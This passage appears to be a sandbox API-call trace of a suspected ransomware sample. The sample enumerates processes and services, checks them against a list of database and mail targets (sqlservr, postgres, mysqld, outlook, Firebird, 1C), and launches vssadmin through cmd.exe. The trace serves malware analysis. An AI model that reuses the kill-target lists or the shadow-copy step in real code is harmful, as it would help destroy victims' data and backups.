lpString2="System") returned -1 [0055.154] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0055.154] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0055.155] lstrlenW (lpString="smss.exe") returned 8 [0055.155] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0055.155] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0055.155] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0055.155] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0055.155] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0055.155] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0055.155] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0055.155] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.156] lstrlenW (lpString="csrss.exe") returned 9 [0055.156] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0055.156] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0055.156] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0055.156] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0055.156] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0055.156] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0055.156] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0055.156] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0055.157] lstrlenW (lpString="wininit.exe") returned 11 [0055.157] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0055.157] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0055.157] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0055.157] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.157] lstrlenW (lpString="csrss.exe") returned 9 [0055.158] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0055.158] lstrlenW (lpString="winlogon.exe") returned 12 [0055.158] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0055.159] lstrlenW (lpString="services.exe") returned 12 [0055.159] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0055.160] lstrlenW (lpString="lsass.exe") returned 9 [0055.160] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0055.160] lstrlenW (lpString="lsm.exe") returned 7 [0055.160] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.161] lstrlenW (lpString="svchost.exe") returned 11 [0055.161] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.162] lstrlenW (lpString="svchost.exe") returned 11 [0055.162] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.162] lstrlenW (lpString="svchost.exe") returned 11 [0055.162] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.163] lstrlenW (lpString="svchost.exe") returned 11 [0055.163] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.164] lstrlenW (lpString="svchost.exe") returned 11 [0055.164] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0055.165] lstrlenW (lpString="audiodg.exe") returned 11 [0055.165] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.165] lstrlenW (lpString="svchost.exe") returned 11 [0055.165] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.166] lstrlenW (lpString="svchost.exe") returned 11 [0055.166] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0055.167] lstrlenW (lpString="dwm.exe") returned 7 [0055.167] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0055.167] lstrlenW (lpString="explorer.exe") returned 12 [0055.167] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0055.168] lstrlenW (lpString="spoolsv.exe") returned 11 [0055.168] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0055.169] lstrlenW (lpString="taskhost.exe") returned 12 [0055.169] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.170] lstrlenW (lpString="svchost.exe") returned 11 [0055.170] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0055.170] lstrlenW (lpString="taskeng.exe") returned 11 [0055.170] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0055.171] lstrlenW (lpString="taskhost.exe") returned 12 [0055.171] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0055.172] lstrlenW (lpString="called.exe") returned 10 [0055.172] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0055.172] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0055.172] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0055.173] lstrlenW (lpString="analyst.exe") returned 11 [0055.173] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0055.174] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0055.174] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0055.175] lstrlenW (lpString="wages.exe") returned 9 [0055.175] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0055.175] lstrlenW (lpString="rand.exe") returned 8 [0055.175] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0055.176] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0055.176] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0055.177] lstrlenW (lpString="cottage.exe") returned 11 [0055.177] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0055.177] lstrlenW (lpString="pairs_spec.exe") returned 14 [0055.177] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0055.178] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0055.178] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0055.179] lstrlenW (lpString="observationshairy.exe") returned 21 [0055.179] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0055.179] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0055.179] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0055.180] lstrlenW (lpString="spectrum.exe") returned 12 [0055.180] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0055.181] lstrlenW (lpString="dies.exe") returned 8 [0055.181] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0055.182] lstrlenW (lpString="configured.exe") returned 14 [0055.182] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0055.182] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0055.182] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0055.183] lstrlenW (lpString="fast.exe") returned 8 [0055.183] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0055.184] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0055.184] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0055.184] lstrlenW (lpString="review.exe") returned 10 [0055.184] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0055.643] lstrlenW (lpString="historybinding.exe") returned 18 [0055.643] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0055.644] lstrlenW (lpString="pk task surge.exe") returned 17 [0055.644] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0055.644] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0055.644] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0055.645] lstrlenW (lpString="ivttvf.exe") returned 10 [0055.645] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0055.646] lstrlenW (lpString="cmd.exe") returned 7 [0055.646] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0055.646] lstrlenW (lpString="conhost.exe") returned 11 [0055.647] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0055.647] lstrlenW (lpString="vssadmin.exe") returned 12 [0055.647] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0055.648] lstrlenW (lpString="VSSVC.exe") returned 9 [0055.648] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.649] lstrlenW (lpString="svchost.exe") returned 11 [0055.649] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0055.649] CloseHandle (hObject=0x224) returned 1 [0055.649] Sleep (dwMilliseconds=0x1f4) [0056.326] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5ef9b8 [0056.326] EnumServicesStatusExW (in: hSCManager=0x5ef9b8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0056.326] GetLastError () returned 0xea [0056.326] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12c6) returned 0x3f740a8 [0056.326] EnumServicesStatusExW (in: hSCManager=0x5ef9b8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3f740a8, cbBufSize=0x12c6, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3f740a8, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0056.327] CloseServiceHandle (hSCObject=0x5ef9b8) returned 1 [0056.327] lstrlenW (lpString="Appinfo") returned 7 [0056.327] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0056.327] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0056.327] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0056.327] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0056.327] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0056.327] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0056.327] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0056.327] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0056.327] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0056.327] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0056.327] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0056.327] lstrlenW (lpString="AudioSrv") returned 8 [0056.327] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0056.327] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0056.327] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0056.327] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0056.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0056.328] lstrlenW (lpString="BFE") returned 3 [0056.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0056.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0056.328] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0056.328] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0056.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0056.328] lstrlenW (lpString="CryptSvc") returned 8 [0056.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0056.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0056.328] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0056.328] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0056.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0056.328] lstrlenW (lpString="CscService") returned 10 [0056.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0056.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0056.328] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0056.328] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0056.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0056.328] lstrlenW (lpString="DcomLaunch") returned 10 [0056.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0056.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0056.328] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0056.328] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0056.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0056.328] lstrlenW (lpString="Dhcp") returned 4 [0056.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0056.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0056.328] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0056.328] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0056.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0056.328] lstrlenW (lpString="Dnscache") returned 8 [0056.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0056.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0056.329] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0056.329] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0056.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0056.329] lstrlenW (lpString="DPS") returned 3 [0056.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0056.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0056.329] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0056.329] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0056.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0056.329] lstrlenW (lpString="eventlog") returned 8 [0056.329] lstrcmpiW 